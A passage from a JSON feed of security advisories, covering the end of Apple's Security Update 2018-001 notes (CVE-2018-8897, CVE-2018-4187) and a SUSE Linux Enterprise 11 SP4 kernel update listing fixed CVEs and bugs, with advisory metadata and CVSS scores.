circumstances, some operating systems may not expect or properly handle an Intel architecture debug exception after certain instructions. The issue appears to be from an undocumented side effect of the instructions. An attacker might utilize this exception handling to gain access to Ring 0 and access sensitive memory or control operating system processes.\n\nCVE-2018-8897: Andy Lutomirski, Nick Peterson (linkedin.com/in/everdox) of Everdox Tech LLC\n\nEntry added May 8, 2018\n\n**LinkPresentation**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: Processing a maliciously crafted text message may lead to UI spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4187: Zhiyang Zeng (@Wester) of Tencent Security Platform Department, Roman Mueller (@faker_)\n\n\n\nInstalling Security Update 2018-001 updates Safari to version 11.1 (13605.1.33.1.4).\n\nTo check the version of Safari installed on your Mac:\n\n 1. Open Safari.\n 2. Choose Safari > About Safari.\n", "edition": 1, "modified": "2018-05-08T05:03:32", "published": "2018-05-08T05:03:32", "id": "APPLE:HT208742", "href": "https://support.apple.com/kb/HT208742", "title": "About the security content of Security Update 2018-001 - Apple Support", "type": "apple", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2018-05-09T02:03:09", "bulletinFamily": "unix", "cvelist": ["CVE-2018-1087", "CVE-2018-8897", "CVE-2018-10124"], "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2018-1087: And an unprivileged KVM guest user could use this flaw to\n potentially escalate their privileges inside a guest. (bsc#1087088)\n - CVE-2018-8897: An unprivileged system user could use incorrect set up\n interrupt stacks to crash the Linux kernel resulting in DoS issue.\n (bsc#1087088)\n - CVE-2018-10124: The kill_something_info function in kernel/signal.c in\n the Linux kernel before 4.13, when an unspecified architecture and\n compiler is used, might allow local users to cause a denial of service\n via an INT_MIN argument (bnc#1089752).\n\n The following non-security bugs were fixed:\n\n - kvm/x86: fix icebp instruction handling (bsc#1087088).\n - media: cpia2: Fix a couple off by one bugs (bsc#1050431).\n - nfs: add nostatflush mount option (bsc#1065726).\n - nfs: allow flush-on-stat to be disabled (bsc#1065726).\n - powerpc/fadump: Add a warning when 'fadump_reserve_mem=' is used\n (bnc#1032084, FATE#323225).\n - powerpc/fadump: reuse crashkernel parameter for fadump memory\n reservation (bnc#1032084, FATE#323225).\n - powerpc/fadump: update documentation about crashkernel parameter reuse\n (bnc#1032084, FATE#323225).\n - powerpc/fadump: use 'fadump_reserve_mem=' when specified (bnc#1032084,\n FATE#323225).\n - x86/entry/64: Do not use IST entry for #BP stack (bsc#1087088).\n\n", "edition": 1, "modified": "2018-05-09T00:07:18", "published": "2018-05-09T00:07:18", "id": "SUSE-SU-2018:1171-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00006.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}]}
